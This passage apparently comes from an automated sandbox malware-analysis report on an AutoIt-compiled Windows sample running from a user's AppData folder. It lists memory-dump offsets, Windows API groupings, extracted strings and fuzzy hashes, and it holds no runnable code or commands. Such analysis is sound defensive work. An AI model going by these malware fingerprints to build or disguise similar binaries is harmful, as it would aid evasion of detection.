                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                      • String ID:
                                                                      • API String ID: 1539411459-0
                                                                      • Opcode ID: 058f7c961f19f1df1cfb2125e1cbf4c754dffe1c4cdb6de871a3d3459fa768a6
                                                                      • Instruction ID: 6495896303a502172fada50fad44051b5f179af223d7d1542f68947cb7c348ff
                                                                      • Opcode Fuzzy Hash: 058f7c961f19f1df1cfb2125e1cbf4c754dffe1c4cdb6de871a3d3459fa768a6
                                                                      • Instruction Fuzzy Hash: 86017535A1C79142E7016F15B809729EB60BBC6FA8F984534DF5943BA1CFBDF4818B90
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentOpenProcessThreadToken
                                                                      • String ID:
                                                                      • API String ID: 3974789173-0
                                                                      • Opcode ID: 5cd93aab99a75fcfcb42631ab9fe43dfed1bd9e6d723e162398547d1910a1280
                                                                      • Instruction ID: f3cd2a4550ccaac7f97e898214535698f6c41895fbaf13f75a38b9554253fcda
                                                                      • Opcode Fuzzy Hash: 5cd93aab99a75fcfcb42631ab9fe43dfed1bd9e6d723e162398547d1910a1280
                                                                      • Instruction Fuzzy Hash: 2EF03061A5D506C2FB516F61E80476A62A4FF58FA9FC84134C90E82350EF7CA9C98390
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                                      • String ID:
                                                                      • API String ID: 2889604237-0
                                                                      • Opcode ID: 1feedfad755e607c49e01145a3823af596c92df2e00356d80eed4a018d1c4b5c
                                                                      • Instruction ID: 079e787106ccea8a4d53c2fa4bc9e9709ce9b831c4d1a6ed4226c15eff527f5a
                                                                      • Opcode Fuzzy Hash: 1feedfad755e607c49e01145a3823af596c92df2e00356d80eed4a018d1c4b5c
                                                                      • Instruction Fuzzy Hash: 90E0E524A0D71686FA11BF72A80C23AA255BF49FE9F808530CD0E83B55DFBCB0858390
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                                      • String ID:
                                                                      • API String ID: 2889604237-0
                                                                      • Opcode ID: 0f8fd1d3423bd3015dfaeae2d2106595fe3726f148ce33332917fba087c4fcce
                                                                      • Instruction ID: d3f80cd5806288b5ce925e11afc6159772a5dfe3a841b1dd211e9e4e53834097
                                                                      • Opcode Fuzzy Hash: 0f8fd1d3423bd3015dfaeae2d2106595fe3726f148ce33332917fba087c4fcce
                                                                      • Instruction Fuzzy Hash: 2CE01A24A0D71686FA01BF71A80C23AA254BF49FE9F804030CD0E83B55DFBDB0458390
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID: gfffffff
                                                                      • API String ID: 3215553584-1523873471
                                                                      • Opcode ID: dc31ed7580b08dc4a7b229eebc0aac3b305a5916052008eb2c70828ae2249d51
                                                                      • Instruction ID: 1782a574e828b41f900496fda06a7a9ce25827f296f07608915b4b7c40ec9247
                                                                      • Opcode Fuzzy Hash: dc31ed7580b08dc4a7b229eebc0aac3b305a5916052008eb2c70828ae2249d51
                                                                      • Instruction Fuzzy Hash: 1C915962B493CA86EB21BF2D91403B8AB95AB267E0F448231DB8D87395DF3CF115C351
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: ContainedObject
                                                                      • String ID: AutoIt3GUI$Container
                                                                      • API String ID: 3565006973-3941886329
                                                                      • Opcode ID: ec532330f33b0a9812ac3d9e654419ff88b42a82dbb45e6ba561f09289b70eff
                                                                      • Instruction ID: 39e5160f4048ac9500394a2469137134e4df753c0558545548eb83507e3b64c8
                                                                      • Opcode Fuzzy Hash: ec532330f33b0a9812ac3d9e654419ff88b42a82dbb45e6ba561f09289b70eff
                                                                      • Instruction Fuzzy Hash: AD914A72604B4681DB24EF29E4506ADB3A5FB88F94F918036DF8D83724DF3AE455C390
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID: e+000$gfff
                                                                      • API String ID: 3215553584-3030954782
                                                                      • Opcode ID: 04dcd116da85894f10939a0f3d563d07a18b7e7aec23bacfc76a5396d48b7619
                                                                      • Instruction ID: 67f949afaa0cd2f72b430bdf976e0b3bd3fac6d83e6949aeeab7e2943d106487
                                                                      • Opcode Fuzzy Hash: 04dcd116da85894f10939a0f3d563d07a18b7e7aec23bacfc76a5396d48b7619
                                                                      • Instruction Fuzzy Hash: AA510962B5C7C146EB65AF399944369AB91EB81BA0F889331C79CC7BD5CF2CE044C750
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: FileModuleName_invalid_parameter_noinfo
                                                                      • String ID: C:\Users\user\AppData\Roaming\PefjSkkhb.exe
                                                                      • API String ID: 3307058713-2188861997
                                                                      • Opcode ID: d66799c7fb8d49ba8911ba2da8beafd52f849db9660eadf2b3aeaa59b2ad0887
                                                                      • Instruction ID: 50d9ed4898a93380c3c65fa0b0f2fc00ebe817ab84174fd7d3672b290160bd9b
                                                                      • Opcode Fuzzy Hash: d66799c7fb8d49ba8911ba2da8beafd52f849db9660eadf2b3aeaa59b2ad0887
                                                                      • Instruction Fuzzy Hash: 95419E72A49BA285F715BF29E8440B9A7A4EF44BA4F984131E90E87755DF3CF481C3A0
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Window$CreateDestroyMessageObjectSendStock
                                                                      • String ID: static
                                                                      • API String ID: 3467290483-2160076837
                                                                      • Opcode ID: a4bdc31031acf25a780acb8ebad28d815df5c0ae00d3c31ea018055d33185612
                                                                      • Instruction ID: 54a2536cae38cb081b2f5995696e2fc37a264900ac61f5bf597a50f33cf08959
                                                                      • Opcode Fuzzy Hash: a4bdc31031acf25a780acb8ebad28d815df5c0ae00d3c31ea018055d33185612
                                                                      • Instruction Fuzzy Hash: 544100326486C2C6D670AF25E4407AEB7A1FB847A1F904135EBE943B59DF3CE481CB50
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWidehtonsinet_addr
                                                                      • String ID: 255.255.255.255
                                                                      • API String ID: 2496851823-2422070025
                                                                      • Opcode ID: e55c8c587f1448b1a4207f66a752895f1a07630204b4ee05391494375fe3cc25
                                                                      • Instruction ID: 94d9a51667174bd7c4f7bf35315c9ffcd40f44cd4809e46ec04ada5cdfea44f9
                                                                      • Opcode Fuzzy Hash: e55c8c587f1448b1a4207f66a752895f1a07630204b4ee05391494375fe3cc25
                                                                      • Instruction Fuzzy Hash: 0531DE63A58A4681EB10BF22D84027CB760FB54BA8F858532DE6E833A1DF3CF545C360
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: _snwprintf
                                                                      • String ID: , $$AUTOITCALLVARIABLE%d
                                                                      • API String ID: 3988819677-2584243854
                                                                      • Opcode ID: c7e08f6a60c99c5d777c2b71318a0fa50eea3cb020f88eb0f1ff8c1330ae95ab
                                                                      • Instruction ID: f88c910800ea0b0acb28eed5b56fd9db21a9ad463def7d905c8c787911dfaf9a
                                                                      • Opcode Fuzzy Hash: c7e08f6a60c99c5d777c2b71318a0fa50eea3cb020f88eb0f1ff8c1330ae95ab
                                                                      • Instruction Fuzzy Hash: 13316876B48A0695EB10FF61E4501ECA361FB447A4F904432DA1D97B99DF38F58AC3A0
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Window$CreateMessageObjectSendStock
                                                                      • String ID: $SysTabControl32
                                                                      • API String ID: 2080134422-3143400907
                                                                      • Opcode ID: bda9a96d7587ee0db61141e8122984108ce719646b8dc1b3190cd5c08410ff98
                                                                      • Instruction ID: 08abf4a344b7828b38935e0024b160eb4b34214e73317c8078528a0866118d2c
                                                                      • Opcode Fuzzy Hash: bda9a96d7587ee0db61141e8122984108ce719646b8dc1b3190cd5c08410ff98
                                                                      • Instruction Fuzzy Hash: 60315C325087C1CAE760EF15E44475AB7A1F784BB4F544335EAA857BD8CB38E4818F50
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: FileHandleType
                                                                      • String ID: @
                                                                      • API String ID: 3000768030-2766056989
                                                                      • Opcode ID: 6504a464ad744481ce6bc1c71c4353ab51ac4f53e5ce451b4dcbbfd06c50b848
                                                                      • Instruction ID: ecc5cd7126318b67e0bccde834585f3e8e46ebdbe962b31abc59e60bc59a68da
                                                                      • Opcode Fuzzy Hash: 6504a464ad744481ce6bc1c71c4353ab51ac4f53e5ce451b4dcbbfd06c50b848
                                                                      • Instruction Fuzzy Hash: E421C522A4CA9281EF64BF2D9490139E750EB85774F681335D66E877D4CF78F881D3A0
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                      • String ID: static
                                                                      • API String ID: 1983116058-2160076837
                                                                      • Opcode ID: 2cf77c951f50a5aa7b90eeaf8a6614b83960d367aa0043a5ee29e49d78538776
                                                                      • Instruction ID: 1a7b4098c1b8ce42aa81960a86bd47576018b2d7365628e48f03422c85686718
                                                                      • Opcode Fuzzy Hash: 2cf77c951f50a5aa7b90eeaf8a6614b83960d367aa0043a5ee29e49d78538776
                                                                      • Instruction Fuzzy Hash: 68314B76A08781CBD724DF29E444B5AB7A5F7887A0F504239EB9943B98DB3CE841CF50
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$CreateObjectStockWindow
                                                                      • String ID: Combobox
                                                                      • API String ID: 1025951953-2096851135
                                                                      • Opcode ID: 64d9c3cb7b5de17515fad991fab36aed20c74e14fc7f9fd3c19d97b8fd4a0418
                                                                      • Instruction ID: 6e46aa54500857d9207c0cd60890c15cacfac450afd9990257d3973089341d1b
                                                                      • Opcode Fuzzy Hash: 64d9c3cb7b5de17515fad991fab36aed20c74e14fc7f9fd3c19d97b8fd4a0418
                                                                      • Instruction Fuzzy Hash: 12312E32609781CAE7709F15B444B5AB7A1F7857A0F904239EAA943B99CB3CD885CF50
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: LengthMessageSendTextWindow
                                                                      • String ID: edit
                                                                      • API String ID: 2978978980-2167791130
                                                                      • Opcode ID: 7385061f885e14c89e765babf531e3acc6228f8566b1a940e972c4d460c7f125
                                                                      • Instruction ID: b29fa6b517f851bb0e14fd6a3cb3e6c83fb55cfe4249926dcd157c8d0df015c1
                                                                      • Opcode Fuzzy Hash: 7385061f885e14c89e765babf531e3acc6228f8566b1a940e972c4d460c7f125
                                                                      • Instruction Fuzzy Hash: 14313E36A08781CAE770DF15E44475AB7A1F7847A0F544235EAAC83B98DB3CE881CF51
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: _handle_error
                                                                      • String ID: "$pow
                                                                      • API String ID: 1757819995-713443511
                                                                      • Opcode ID: 2773d63829b6bc9e243f88705d039ab02ec385488ae35a30c1ce332e33ed45c5
                                                                      • Instruction ID: ef5e745b3958239973511500a6e7d4395ea08c7fbf453a1daaed71b4e61520fe
                                                                      • Opcode Fuzzy Hash: 2773d63829b6bc9e243f88705d039ab02ec385488ae35a30c1ce332e33ed45c5
                                                                      • Instruction Fuzzy Hash: 38218F72D1CAC587E370EF14E04066AFAA0FFDA364F601325F28946A55CBBDE0859B50
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: ClassMessageNameSend
                                                                      • String ID: ComboBox$ListBox
                                                                      • API String ID: 3678867486-1403004172
                                                                      • Opcode ID: 97deb16edf8e784fc52f0d006fa99df0b5c043f3f1d7c65ec9baf9ca6ee38585
                                                                      • Instruction ID: 651ceda27a30747ffb5f92a8b7236372e097625bea3396896dc586f8ad291c03
                                                                      • Opcode Fuzzy Hash: 97deb16edf8e784fc52f0d006fa99df0b5c043f3f1d7c65ec9baf9ca6ee38585
                                                                      • Instruction Fuzzy Hash: 9111C372A4DA8181EA10FF11D4400A9A3A1FB95BB0F844631DAAC877D9DF3CF545C790
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Internet$OpenOption
                                                                      • String ID: <local>
                                                                      • API String ID: 942729171-4266983199
                                                                      • Opcode ID: 8fc137a1ef2bd80f32763a254e30885bf035247cf28a45f4fd96fdfcbffecfa0
                                                                      • Instruction ID: 034f81a943e375ae3b03ea0dad75436ac8e100aa3a8f57880d925729cdb56aed
